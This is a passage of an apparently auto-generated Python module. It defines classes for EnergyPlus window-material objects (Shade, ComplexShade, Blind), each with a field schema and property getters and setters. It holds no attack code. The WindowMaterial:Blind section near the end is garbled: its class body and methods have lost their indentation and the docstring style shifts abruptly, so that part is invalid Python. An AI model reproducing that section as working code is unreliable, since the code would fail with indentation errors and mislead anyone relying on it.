              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'bottom opening multiplier',
             {'name': u'Bottom Opening Multiplier',
              'pyname': u'bottom_opening_multiplier',
              'default': 0.5, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'left-side opening multiplier',
             {'name': u'Left-Side Opening Multiplier',
              'pyname': u'leftside_opening_multiplier',
              'default': 0.5, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'right-side opening multiplier',
             {'name': u'Right-Side Opening Multiplier',
              'pyname': u'rightside_opening_multiplier',
              'default': 0.5, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'airflow permeability',
             {'name': u'Airflow Permeability',
              'pyname': u'airflow_permeability',
              'default': 0.0, 'maximum': 0.8,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'})]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 15,
        'name': u'WindowMaterial:Shade',
        'pyname': u'WindowMaterialShade',
        'required-object': False,
        'unique-object': False}

    # Each property below is a thin accessor over the DataObject field store;
    # validation against _schema happens inside DataObject.__setitem__.

    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def solar_transmittance(self):
        """field `Solar Transmittance`
        | Assumed independent of incidence angle
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Solar Transmittance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `solar_transmittance` or None if not set
        """
        return self["Solar Transmittance"]

    @solar_transmittance.setter
    def solar_transmittance(self, value=None):
        """Corresponds to IDD field `Solar Transmittance`"""
        self["Solar Transmittance"] = value

    @property
    def solar_reflectance(self):
        """field `Solar Reflectance`
        | Assumed same for both sides
        | Assumed independent of incidence angle
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Solar Reflectance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `solar_reflectance` or None if not set
        """
        return self["Solar Reflectance"]

    @solar_reflectance.setter
    def solar_reflectance(self, value=None):
        """Corresponds to IDD field `Solar Reflectance`"""
        self["Solar Reflectance"] = value

    @property
    def visible_transmittance(self):
        """field `Visible Transmittance`
        | Assumed independent of incidence angle
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Visible Transmittance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `visible_transmittance` or None if not set
        """
        return self["Visible Transmittance"]

    @visible_transmittance.setter
    def visible_transmittance(self, value=None):
        """Corresponds to IDD field `Visible Transmittance`"""
        self["Visible Transmittance"] = value

    @property
    def visible_reflectance(self):
        """field `Visible Reflectance`
        | Assumed same for both sides
        | Assumed independent of incidence angle
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Visible Reflectance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `visible_reflectance` or None if not set
        """
        return self["Visible Reflectance"]

    @visible_reflectance.setter
    def visible_reflectance(self, value=None):
        """Corresponds to IDD field `Visible Reflectance`"""
        self["Visible Reflectance"] = value

    @property
    def infrared_hemispherical_emissivity(self):
        """field `Infrared Hemispherical Emissivity`
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Infrared Hemispherical Emissivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `infrared_hemispherical_emissivity` or None if not set
        """
        return self["Infrared Hemispherical Emissivity"]

    @infrared_hemispherical_emissivity.setter
    def infrared_hemispherical_emissivity(self, value=None):
        """Corresponds to IDD field `Infrared Hemispherical Emissivity`"""
        self["Infrared Hemispherical Emissivity"] = value

    @property
    def infrared_transmittance(self):
        """field `Infrared Transmittance`
        | Units: dimensionless
        | value < 1.0
        Args:
            value (float): value for IDD Field `Infrared Transmittance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `infrared_transmittance` or None if not set
        """
        return self["Infrared Transmittance"]

    @infrared_transmittance.setter
    def infrared_transmittance(self, value=None):
        """Corresponds to IDD field `Infrared Transmittance`"""
        self["Infrared Transmittance"] = value

    @property
    def thickness(self):
        """field `Thickness`
        | Units: m
        | IP-Units: in
        Args:
            value (float): value for IDD Field `Thickness`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def conductivity(self):
        """field `Conductivity`
        | Units: W/m-K
        Args:
            value (float): value for IDD Field `Conductivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `conductivity` or None if not set
        """
        return self["Conductivity"]

    @conductivity.setter
    def conductivity(self, value=None):
        """Corresponds to IDD field `Conductivity`"""
        self["Conductivity"] = value

    @property
    def shade_to_glass_distance(self):
        """field `Shade to Glass Distance`
        | Units: m
        | IP-Units: in
        | Default value: 0.05
        | value >= 0.001
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Shade to Glass Distance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `shade_to_glass_distance` or None if not set
        """
        return self["Shade to Glass Distance"]

    @shade_to_glass_distance.setter
    def shade_to_glass_distance(self, value=0.05):
        """Corresponds to IDD field `Shade to Glass Distance`"""
        self["Shade to Glass Distance"] = value

    @property
    def top_opening_multiplier(self):
        """field `Top Opening Multiplier`
        | Default value: 0.5
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Top Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `top_opening_multiplier` or None if not set
        """
        return self["Top Opening Multiplier"]

    @top_opening_multiplier.setter
    def top_opening_multiplier(self, value=0.5):
        """Corresponds to IDD field `Top Opening Multiplier`"""
        self["Top Opening Multiplier"] = value

    @property
    def bottom_opening_multiplier(self):
        """field `Bottom Opening Multiplier`
        | Default value: 0.5
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Bottom Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `bottom_opening_multiplier` or None if not set
        """
        return self["Bottom Opening Multiplier"]

    @bottom_opening_multiplier.setter
    def bottom_opening_multiplier(self, value=0.5):
        """Corresponds to IDD field `Bottom Opening Multiplier`"""
        self["Bottom Opening Multiplier"] = value

    @property
    def leftside_opening_multiplier(self):
        """field `Left-Side Opening Multiplier`
        | Default value: 0.5
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Left-Side Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `leftside_opening_multiplier` or None if not set
        """
        return self["Left-Side Opening Multiplier"]

    @leftside_opening_multiplier.setter
    def leftside_opening_multiplier(self, value=0.5):
        """ Corresponds to IDD field `Left-Side Opening Multiplier`
        """
        self["Left-Side Opening Multiplier"] = value

    @property
    def rightside_opening_multiplier(self):
        """field `Right-Side Opening Multiplier`
        | Default value: 0.5
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Right-Side Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `rightside_opening_multiplier` or None if not set
        """
        return self["Right-Side Opening Multiplier"]

    @rightside_opening_multiplier.setter
    def rightside_opening_multiplier(self, value=0.5):
        """ Corresponds to IDD field `Right-Side Opening Multiplier`
        """
        self["Right-Side Opening Multiplier"] = value

    @property
    def airflow_permeability(self):
        """field `Airflow Permeability`
        | Units: dimensionless
        | value <= 0.8
        Args:
            value (float): value for IDD Field `Airflow Permeability`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `airflow_permeability` or None if not set
        """
        return self["Airflow Permeability"]

    @airflow_permeability.setter
    def airflow_permeability(self, value=None):
        """Corresponds to IDD field `Airflow Permeability`"""
        self["Airflow Permeability"] = value
class WindowMaterialComplexShade(DataObject):

    """ Corresponds to IDD object `WindowMaterial:ComplexShade`
        Complex window shading layer thermal properties
    """

    # Machine-generated metadata mirroring the EnergyPlus IDD definition of
    # WindowMaterial:ComplexShade.  DataObject consults it for field order,
    # defaults, accepted choices and validation limits; 'minimum>' denotes a
    # strict (exclusive) lower bound.  Do not edit by hand.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name',
              'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'alpha'}),
            (u'layer type',
             {'name': u'Layer Type', 'pyname': u'layer_type',
              'default': u'OtherShadingType',
              'required-field': False, 'autosizable': False,
              'accepted-values': [u'Venetian',
                                  u'Woven',
                                  u'Perforated',
                                  u'BSDF',
                                  u'OtherShadingType'],
              'autocalculatable': False, 'type': 'alpha'}),
            (u'thickness',
             {'name': u'Thickness', 'pyname': u'thickness',
              'default': 0.002, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'm'}),
            (u'conductivity',
             {'name': u'Conductivity', 'pyname': u'conductivity',
              'default': 1.0, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'W/m-K'}),
            (u'ir transmittance',
             {'name': u'IR Transmittance', 'pyname': u'ir_transmittance',
              'default': 0.0, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'front emissivity',
             {'name': u'Front Emissivity', 'pyname': u'front_emissivity',
              'default': 0.84, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'back emissivity',
             {'name': u'Back Emissivity', 'pyname': u'back_emissivity',
              'default': 0.84, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'top opening multiplier',
             {'name': u'Top Opening Multiplier',
              'pyname': u'top_opening_multiplier',
              'default': 0.0, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'bottom opening multiplier',
             {'name': u'Bottom Opening Multiplier',
              'pyname': u'bottom_opening_multiplier',
              'default': 0.0, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'left side opening multiplier',
             {'name': u'Left Side Opening Multiplier',
              'pyname': u'left_side_opening_multiplier',
              'default': 0.0, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'right side opening multiplier',
             {'name': u'Right Side Opening Multiplier',
              'pyname': u'right_side_opening_multiplier',
              'default': 0.0, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'front opening multiplier',
             {'name': u'Front Opening Multiplier',
              'pyname': u'front_opening_multiplier',
              'default': 0.05, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False, 'type': u'real'}),
            (u'slat width',
             {'name': u'Slat Width', 'pyname': u'slat_width',
              'default': 0.016, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'm'}),
            (u'slat spacing',
             {'name': u'Slat Spacing', 'pyname': u'slat_spacing',
              'default': 0.012, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'm'}),
            (u'slat thickness',
             {'name': u'Slat Thickness', 'pyname': u'slat_thickness',
              'default': 0.0006, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'm'}),
            (u'slat angle',
             {'name': u'Slat Angle', 'pyname': u'slat_angle',
              'default': 90.0, 'maximum': 90.0,
              'required-field': False, 'autosizable': False,
              'minimum': -90.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'deg'}),
            (u'slat conductivity',
             {'name': u'Slat Conductivity', 'pyname': u'slat_conductivity',
              'default': 160.0, 'minimum>': 0.0,
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'W/m-K'}),
            (u'slat curve',
             {'name': u'Slat Curve', 'pyname': u'slat_curve',
              'default': 0.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'm'})]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 12,
        'name': u'WindowMaterial:ComplexShade',
        'pyname': u'WindowMaterialComplexShade',
        'required-object': False,
        'unique-object': False}

    # Each property below is a thin accessor over the DataObject field store;
    # validation against _schema happens inside DataObject.__setitem__.

    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def layer_type(self):
        """field `Layer Type`
        | Default value: OtherShadingType
        Args:
            value (str): value for IDD Field `Layer Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_type` or None if not set
        """
        return self["Layer Type"]

    @layer_type.setter
    def layer_type(self, value="OtherShadingType"):
        """Corresponds to IDD field `Layer Type`"""
        self["Layer Type"] = value

    @property
    def thickness(self):
        """field `Thickness`
        | Units: m
        | Default value: 0.002
        Args:
            value (float): value for IDD Field `Thickness`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=0.002):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def conductivity(self):
        """field `Conductivity`
        | Units: W/m-K
        | Default value: 1.0
        Args:
            value (float): value for IDD Field `Conductivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `conductivity` or None if not set
        """
        return self["Conductivity"]

    @conductivity.setter
    def conductivity(self, value=1.0):
        """Corresponds to IDD field `Conductivity`"""
        self["Conductivity"] = value

    @property
    def ir_transmittance(self):
        """field `IR Transmittance`
        | value <= 1.0
        Args:
            value (float): value for IDD Field `IR Transmittance`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `ir_transmittance` or None if not set
        """
        return self["IR Transmittance"]

    @ir_transmittance.setter
    def ir_transmittance(self, value=None):
        """Corresponds to IDD field `IR Transmittance`"""
        self["IR Transmittance"] = value

    @property
    def front_emissivity(self):
        """field `Front Emissivity`
        | Default value: 0.84
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Front Emissivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `front_emissivity` or None if not set
        """
        return self["Front Emissivity"]

    @front_emissivity.setter
    def front_emissivity(self, value=0.84):
        """Corresponds to IDD field `Front Emissivity`"""
        self["Front Emissivity"] = value

    @property
    def back_emissivity(self):
        """field `Back Emissivity`
        | Default value: 0.84
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Back Emissivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `back_emissivity` or None if not set
        """
        return self["Back Emissivity"]

    @back_emissivity.setter
    def back_emissivity(self, value=0.84):
        """Corresponds to IDD field `Back Emissivity`"""
        self["Back Emissivity"] = value

    @property
    def top_opening_multiplier(self):
        """field `Top Opening Multiplier`
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Top Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `top_opening_multiplier` or None if not set
        """
        return self["Top Opening Multiplier"]

    @top_opening_multiplier.setter
    def top_opening_multiplier(self, value=None):
        """Corresponds to IDD field `Top Opening Multiplier`"""
        self["Top Opening Multiplier"] = value

    @property
    def bottom_opening_multiplier(self):
        """field `Bottom Opening Multiplier`
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Bottom Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `bottom_opening_multiplier` or None if not set
        """
        return self["Bottom Opening Multiplier"]

    @bottom_opening_multiplier.setter
    def bottom_opening_multiplier(self, value=None):
        """Corresponds to IDD field `Bottom Opening Multiplier`"""
        self["Bottom Opening Multiplier"] = value

    @property
    def left_side_opening_multiplier(self):
        """field `Left Side Opening Multiplier`
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Left Side Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `left_side_opening_multiplier` or None if not set
        """
        return self["Left Side Opening Multiplier"]

    @left_side_opening_multiplier.setter
    def left_side_opening_multiplier(self, value=None):
        """Corresponds to IDD field `Left Side Opening Multiplier`"""
        self["Left Side Opening Multiplier"] = value

    @property
    def right_side_opening_multiplier(self):
        """field `Right Side Opening Multiplier`
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Right Side Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `right_side_opening_multiplier` or None if not set
        """
        return self["Right Side Opening Multiplier"]

    @right_side_opening_multiplier.setter
    def right_side_opening_multiplier(self, value=None):
        """Corresponds to IDD field `Right Side Opening Multiplier`"""
        self["Right Side Opening Multiplier"] = value

    @property
    def front_opening_multiplier(self):
        """field `Front Opening Multiplier`
        | Default value: 0.05
        | value <= 1.0
        Args:
            value (float): value for IDD Field `Front Opening Multiplier`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `front_opening_multiplier` or None if not set
        """
        return self["Front Opening Multiplier"]

    @front_opening_multiplier.setter
    def front_opening_multiplier(self, value=0.05):
        """Corresponds to IDD field `Front Opening Multiplier`"""
        self["Front Opening Multiplier"] = value

    @property
    def slat_width(self):
        """field `Slat Width`
        | Units: m
        | Default value: 0.016
        Args:
            value (float): value for IDD Field `Slat Width`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_width` or None if not set
        """
        return self["Slat Width"]

    @slat_width.setter
    def slat_width(self, value=0.016):
        """Corresponds to IDD field `Slat Width`"""
        self["Slat Width"] = value

    @property
    def slat_spacing(self):
        """field `Slat Spacing`
        | Distance between adjacent slat faces
        | Units: m
        | Default value: 0.012
        Args:
            value (float): value for IDD Field `Slat Spacing`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_spacing` or None if not set
        """
        return self["Slat Spacing"]

    @slat_spacing.setter
    def slat_spacing(self, value=0.012):
        """Corresponds to IDD field `Slat Spacing`"""
        self["Slat Spacing"] = value

    @property
    def slat_thickness(self):
        """field `Slat Thickness`
        | Distance between top and bottom surfaces of slat
        | Slat is assumed to be rectangular in cross section and flat
        | Units: m
        | Default value: 0.0006
        Args:
            value (float): value for IDD Field `Slat Thickness`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_thickness` or None if not set
        """
        return self["Slat Thickness"]

    @slat_thickness.setter
    def slat_thickness(self, value=0.0006):
        """Corresponds to IDD field `Slat Thickness`"""
        self["Slat Thickness"] = value

    @property
    def slat_angle(self):
        """field `Slat Angle`
        | Units: deg
        | Default value: 90.0
        | value >= -90.0
        | value <= 90.0
        Args:
            value (float): value for IDD Field `Slat Angle`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_angle` or None if not set
        """
        return self["Slat Angle"]

    @slat_angle.setter
    def slat_angle(self, value=90.0):
        """Corresponds to IDD field `Slat Angle`"""
        self["Slat Angle"] = value

    @property
    def slat_conductivity(self):
        """field `Slat Conductivity`
        | Units: W/m-K
        | Default value: 160.0
        Args:
            value (float): value for IDD Field `Slat Conductivity`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_conductivity` or None if not set
        """
        return self["Slat Conductivity"]

    @slat_conductivity.setter
    def slat_conductivity(self, value=160.0):
        """Corresponds to IDD field `Slat Conductivity`"""
        self["Slat Conductivity"] = value

    @property
    def slat_curve(self):
        """field `Slat Curve`
        | this value represents curvature radius of the slat.
        | if the slat is flat use zero.
        | if this value is not zero, then it must be > SlatWidth/2.
        | Units: m
        Args:
            value (float): value for IDD Field `Slat Curve`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `slat_curve` or None if not set
        """
        return self["Slat Curve"]

    @slat_curve.setter
    def slat_curve(self, value=None):
        """Corresponds to IDD field `Slat Curve`"""
        self["Slat Curve"] = value
class WindowMaterialBlind(DataObject):
""" Corresponds to IDD object `WindowMaterial:Blind`
Window blind thermal properties
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'slat orientation',
{'name': u'Slat Orientation',
'pyname': u'slat_orientation',
'default': u'Horizontal',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Horizontal',
u'Vertical'],
'autocalculatable': False,
'type': 'alpha'}),
(u'slat width',
{'name': u'Slat Width',
'pyname': u'slat_width',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat separation',
{'name': u'Slat Separation',
'pyname': u'slat_separation',
'minimum>': 0.0,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat thickness',
{'name': u'Slat Thickness',
'pyname': u'slat_thickness',
'default': 0.00025,
'minimum>': 0.0,
'maximum': 0.1,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat angle',
{'name': u'Slat Angle',
'pyname': u'slat_angle',
'default': 45.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'slat conductivity',
{'name': u'Slat Conductivity',
'pyname': u'slat_conductivity',
'default': 221.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'slat beam solar transmittance',
{'name': u'Slat Beam Solar Transmittance',
'pyname': u'slat_beam_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat beam solar reflectance',
{'name': u'Front Side Slat Beam Solar Reflectance',
'pyname': u'front_side_slat_beam_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat beam solar reflectance',
{'name': u'Back Side Slat Beam Solar Reflectance',
'pyname': u'back_side_slat_beam_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat diffuse solar transmittance',
{'name': u'Slat Diffuse Solar Transmittance',
'pyname': u'slat_diffuse_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat diffuse solar reflectance',
{'name': u'Front Side Slat Diffuse Solar Reflectance',
'pyname': u'front_side_slat_diffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat diffuse solar reflectance',
{'name': u'Back Side Slat Diffuse Solar Reflectance',
'pyname': u'back_side_slat_diffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat beam visible transmittance',
{'name': u'Slat Beam Visible Transmittance',
'pyname': u'slat_beam_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat beam visible reflectance',
{'name': u'Front Side Slat Beam Visible Reflectance',
'pyname': u'front_side_slat_beam_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat beam visible reflectance',
{'name': u'Back Side Slat Beam Visible Reflectance',
'pyname': u'back_side_slat_beam_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat diffuse visible transmittance',
{'name': u'Slat Diffuse Visible Transmittance',
'pyname': u'slat_diffuse_visible_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat diffuse visible reflectance',
{'name': u'Front Side Slat Diffuse Visible Reflectance',
'pyname': u'front_side_slat_diffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat diffuse visible reflectance',
{'name': u'Back Side Slat Diffuse Visible Reflectance',
'pyname': u'back_side_slat_diffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'slat infrared hemispherical transmittance',
{'name': u'Slat Infrared Hemispherical Transmittance',
'pyname': u'slat_infrared_hemispherical_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat infrared hemispherical emissivity',
{'name': u'Front Side Slat Infrared Hemispherical Emissivity',
'pyname': u'front_side_slat_infrared_hemispherical_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat infrared hemispherical emissivity',
{'name': u'Back Side Slat Infrared Hemispherical Emissivity',
'pyname': u'back_side_slat_infrared_hemispherical_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind to glass distance',
{'name': u'Blind to Glass Distance',
'pyname': u'blind_to_glass_distance',
'default': 0.05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.01,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'blind top opening multiplier',
{'name': u'Blind Top Opening Multiplier',
'pyname': u'blind_top_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind bottom opening multiplier',
{'name': u'Blind Bottom Opening Multiplier',
'pyname': u'blind_bottom_opening_multiplier',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind left side opening multiplier',
{'name': u'Blind Left Side Opening Multiplier',
'pyname': u'blind_left_side_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'blind right side opening multiplier',
{'name': u'Blind Right Side Opening Multiplier',
'pyname': u'blind_right_side_opening_multiplier',
'default': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'minimum slat angle',
{'name': u'Minimum Slat Angle',
'pyname': u'minimum_slat_angle',
'default': 0.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'maximum slat angle',
{'name': u'Maximum Slat Angle',
'pyname': u'maximum_slat_angle',
'default': 180.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 29,
'name': u'WindowMaterial:Blind',
'pyname': u'WindowMaterialBlind',
'required-object': False,
'unique-object': False}
@property
def name(self):
    """IDD field `Name`.

    Returns:
        str: the stored value, or None if the field is unset.
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Write IDD field `Name`; invalid values raise ValueError."""
    self["Name"] = value
@property
def slat_orientation(self):
    """IDD field `Slat Orientation`.

    | Default value: Horizontal

    Returns:
        str: the stored value, or None if the field is unset.
    """
    return self["Slat Orientation"]

@slat_orientation.setter
def slat_orientation(self, value="Horizontal"):
    """Write IDD field `Slat Orientation`; invalid values raise ValueError."""
    self["Slat Orientation"] = value
@property
def slat_width(self):
    """IDD field `Slat Width`.

    | Units: m (IP units: in)
    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Width"]

@slat_width.setter
def slat_width(self, value=None):
    """Write IDD field `Slat Width`; invalid values raise ValueError."""
    self["Slat Width"] = value
@property
def slat_separation(self):
    """IDD field `Slat Separation`.

    Distance between adjacent slat faces.

    | Units: m (IP units: in)
    | Constraint: value <= 1.0

    Returns:
        float: the stored value, or None if the field is unset.
    """
    return self["Slat Separation"]

@slat_separation.setter
def slat_separation(self, value=None):
    """Write IDD field `Slat Separation`; invalid values raise ValueError."""
